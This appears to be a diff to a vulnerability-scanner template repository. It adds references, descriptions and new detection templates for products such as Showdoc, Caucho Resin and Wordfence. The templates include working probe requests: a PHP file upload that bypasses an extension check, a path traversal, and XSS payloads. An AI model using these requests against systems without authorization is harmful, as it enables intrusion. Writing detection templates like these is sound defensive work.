@ -42,6 +42,14 @@ requests:
- "text/html"
part: header
- type: word
words:
- "<title>Access Denied</title>"
- "You don't have permission to access"
part: body
condition: and
negative: true
- type: status
status:
- 200

4
vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
View File

@ -5,6 +5,10 @@ info:
author: emenalf & tirtha_mandal
severity: critical
tags: moodle,lfi
reference: |
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
requests:
- method: GET

1
vulnerabilities/other/myucms-lfr.yaml
View File

@ -4,6 +4,7 @@ info:
author: princechaddha
severity: high
tags: myucms,lfi
reference: https://blog.csdn.net/yalecaltech/article/details/104908257
requests:
- method: GET

15
vulnerabilities/other/nuuo-nvrmini2-rce.yaml
View File

@ -1,15 +1,14 @@
id: nuuo-nvrmini2-upgradehandlephp-rce
info:
name: NUUO NVRmini2 3.0.8 - Remote Code Execution
name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
author: berkdusunur
severity: critical
tags: rce
# Reference:-
# https://www.exploit-db.com/exploits/45070
# https://github.com/berkdsnr/NUUO-NVRMINI-RCE
# https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
reference: |
- https://www.exploit-db.com/exploits/45070
- https://github.com/berkdsnr/NUUO-NVRMINI-RCE
- https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
requests:
- method: GET
@ -18,8 +17,8 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- type: word
words:
- "/upload_tmp_dir/"
part: body

3
vulnerabilities/other/oa-v9-uploads-file.yaml
View File

@ -1,9 +1,10 @@
id: oa-v9-uploads-file
info:
name: OA V9 Uploads File
name: OA V9 RCE via File Upload
author: pikpikcu
severity: high
description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
tags: rce,jsp

2
vulnerabilities/other/powercreator-cms-rce.yaml
View File

@ -4,7 +4,7 @@ info:
name: PowerCreator CMS RCE
author: pikpikcu
severity: critical
reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/
reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
tags: rce,powercreator
requests:

23
vulnerabilities/other/rce-via-java-deserialization.yaml
View File

@ -1,23 +0,0 @@
id: rce-via-java-deserialization
info:
name: Java Deserialization [RCE]
author: uhnysh
severity: critical
tags: java,rce
reference: https://www.synopsys.com/blogs/software-security/mitigate-java-deserialization-vulnerability-jboss/
# This can only be used to detect the vuln, please make sure to run ysoserial over the URLs to verify.
requests:
- method: GET
path:
- "{{BaseURL}}/josso/%5C../invoker/EJBInvokerServlet/"
- "{{BaseURL}}/josso/%5C../invoker/JMXInvokerServlet/"
- "{{BaseURL}}/invoker/JMXInvokerServlet/"
- "{{BaseURL}}/invoker/EJBInvokerServlet/"
matchers:
- type: word
words:
- "org.jboss.invocation.MarshalledValue"
- "java.lang"
condition: and

25
vulnerabilities/other/resin-cnnvd-200705-315.yaml Normal file
View File

@ -0,0 +1,25 @@
id: resin-cnnvd-200705-315
info:
name: Caucho Resin Information Disclosure
author: princechaddha
severity: high
reference: |
- http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315
tags: resin,caucho,lfr
requests:
- method: GET
path:
- "{{BaseURL}}/%20../web-inf/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "/ ../web-inf/"
- "Directory of /"
condition: and
part: body

47
vulnerabilities/other/showdoc-file-upload-rce.yaml Normal file
View File

@ -0,0 +1,47 @@
id: showdoc-file-upload-rce
info:
name: Showdoc < 2.8.6 File Upload RCE
author: pikpikcu
severity: critical
reference: https://github.com/star7th/showdoc/pull/1059
tags: rce,fileupload,showdoc
requests:
- raw:
- |
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?php phpinfo();?>
----------------------------835846770881083140190633--
- |
GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
extractors:
- type: regex
name: path
group: 1
internal: true
part: body
regex:
- '/Uploads\\(.*?)"\,"success"'
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "PHP Extension")'
- 'contains(body_2, "PHP Version")'
- 'status_code_2 == 200'
condition: and

5
vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
View File

@ -4,7 +4,10 @@ info:
name: Spring Boot Actuators (Jolokia) XXE
author: dwisiswant0
severity: high
description: todo
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
reference: |
- https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
- https://github.com/mpgn/Spring-Boot-Actuator-Exploit
tags: springboot,jolokia,xxe
requests:

9
vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
View File

@ -9,14 +9,19 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E"
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1337)>"
- "'>\"<svg/onload=confirm('test')>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

1
workflows/cisco-asa-workflow.yaml
View File

@ -17,4 +17,3 @@ workflows:
- template: cves/2020/CVE-2020-3187.yaml
- template: cves/2020/CVE-2020-3452.yaml
- template: cves/2018/CVE-2018-0296.yaml
- template: cves/2018/CVE-2018-0101.yaml

1
workflows/ruijie-workflow.yaml
View File

@ -11,3 +11,4 @@ workflows:
- template: vulnerabilities/other/ruijie-networks-rce.yaml
- template: exposures/configs/ruijie-information-disclosure.yaml
- template: exposures/configs/ruijie-smartweb-disclosure.yaml
- template: exposures/configs/ruijie-phpinfo.yaml

3
workflows/springboot-workflow.yaml
View File

@ -11,11 +11,12 @@ info:
workflows:
- template: technologies/detect-springboot-actuator.yaml
- template: technologies/springboot-actuator.yaml
subtemplates:
- template: misconfiguration/springboot/springboot-configprops.yaml
- template: misconfiguration/springboot/springboot-env.yaml
- template: misconfiguration/springboot/springboot-heapdump.yaml
- template: misconfiguration/springboot/springboot-httptrace.yaml
- template: misconfiguration/springboot/springboot-loggers.yaml
- template: misconfiguration/springboot/springboot-mappings.yaml
- template: misconfiguration/springboot/springboot-trace.yaml